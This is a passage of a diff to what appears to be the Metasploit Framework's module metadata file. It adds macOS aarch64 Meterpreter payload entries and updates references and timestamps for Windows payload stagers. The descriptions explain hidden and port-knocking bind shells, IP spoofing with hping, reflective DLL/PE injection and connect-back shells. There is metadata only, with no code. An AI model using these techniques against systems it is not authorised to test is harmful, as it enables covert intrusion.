+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
+  "payload_osx/aarch64/meterpreter_reverse_tcp": {
+    "name": "OSX Meterpreter, Reverse TCP Inline",
+    "fullname": "payload/osx/aarch64/meterpreter_reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Adam Cammack <adam_cammack@rapid7.com>",
+      "Brent Cook <brent_cook@rapid7.com>",
+      "timwr",
+      "usiegl00"
+    ],
+    "description": "Run the Meterpreter / Mettle server payload (stageless)",
+    "references": [
+
+    ],
+    "platform": "OSX",
+    "arch": "aarch64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-06-19 12:11:18 +0000",
+    "path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "osx/aarch64/meterpreter_reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 1,
+    "staged": false
+  },
  "payload_osx/armle/execute/bind_tcp": {
    "name": "OS X Write and Execute Binary, Bind TCP Stager",
    "fullname": "payload/osx/armle/execute/bind_tcp",
@@ -220883,7 +222236,7 @@
    ],
    "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -220891,7 +222244,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/bind_hidden_ipknock_tcp",
@@ -220925,7 +222278,7 @@
    ],
    "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -220933,7 +222286,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/custom/bind_hidden_tcp",
@@ -222017,7 +223370,8 @@
    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -222025,7 +223379,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_hidden_ipknock_tcp",
@@ -222059,7 +223413,8 @@
    "description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -222067,7 +223422,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/dllinject/bind_hidden_tcp",
@@ -223189,7 +224544,8 @@
    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -223197,7 +224553,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp",
@@ -223232,7 +224588,8 @@
    "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -223240,7 +224597,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter/bind_hidden_tcp",
@@ -224636,7 +225993,7 @@
    ],
    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -224644,7 +226001,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -224678,7 +226035,7 @@
    ],
    "description": "Inject a custom DLL into the exploited process.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -224686,7 +226043,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupdllinject/bind_hidden_tcp",
@@ -225419,7 +226776,7 @@
    ],
    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225427,7 +226784,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
@@ -225461,7 +226818,7 @@
    ],
    "description": "Inject the meterpreter server DLL (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -225469,7 +226826,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/patchupmeterpreter/bind_hidden_tcp",
@@ -226202,7 +227559,8 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226210,7 +227568,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/peinject/bind_hidden_ipknock_tcp",
@@ -226244,7 +227602,8 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226252,7 +227611,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/peinject/bind_hidden_tcp",
@@ -226285,7 +227644,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226327,7 +227686,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226366,7 +227725,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226405,7 +227764,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226446,7 +227805,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226489,7 +227848,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226529,7 +227888,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x86)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226568,7 +227927,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nUse an established connection",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226609,7 +227968,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker over IPv6",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226648,7 +228007,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226687,7 +228046,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (No NX)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226726,7 +228085,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226767,7 +228126,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226808,7 +228167,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226850,7 +228209,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226893,7 +228252,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226936,7 +228295,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -226976,7 +228335,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227207,7 +228566,7 @@
    ],
    "description": "Spawn a piped command shell (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227215,7 +228574,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_hidden_ipknock_tcp",
@@ -227249,7 +228608,7 @@
    ],
    "description": "Spawn a piped command shell (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -227257,7 +228616,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell/bind_hidden_tcp",
@@ -228101,7 +229460,7 @@
    ],
    "description": "Listen for a connection from certain IP and spawn a command shell.\n                          The shellcode will reply with a RST packet if the connections is not\n                          coming from the IP defined in AHOST. This way the port will appear\n                          as \"closed\" helping us to hide the shellcode.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -228109,7 +229468,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/shell_hidden_bind_tcp",
@@ -228214,7 +229573,7 @@
    ],
    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -228222,7 +229581,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_hidden_ipknock_tcp",
@@ -228256,7 +229615,7 @@
    ],
    "description": "Uploads an executable and runs it (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
-
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -228264,7 +229623,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/upexec/bind_hidden_tcp",
@@ -229036,7 +230395,8 @@
    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -229044,7 +230404,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_hidden_ipknock_tcp",
@@ -229078,7 +230438,8 @@
    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
-      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
+      "URL-https://github.com/rapid7/ReflectiveDLLInjection",
+      "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
    ],
    "platform": "Windows",
    "arch": "x86",
@@ -229086,7 +230447,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2023-07-27 16:02:37 +0000",
    "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/vncinject/bind_hidden_tcp",
@@ -230697,7 +232058,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2023-08-03 17:10:11 +0000",
    "path": "/modules/payloads/singles/windows/x64/messagebox.rb",
    "is_install_path": true,
    "ref_name": "windows/x64/messagebox",
@@ -231541,7 +232902,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231581,7 +232942,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231620,7 +232981,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231659,7 +233020,7 @@
    ],
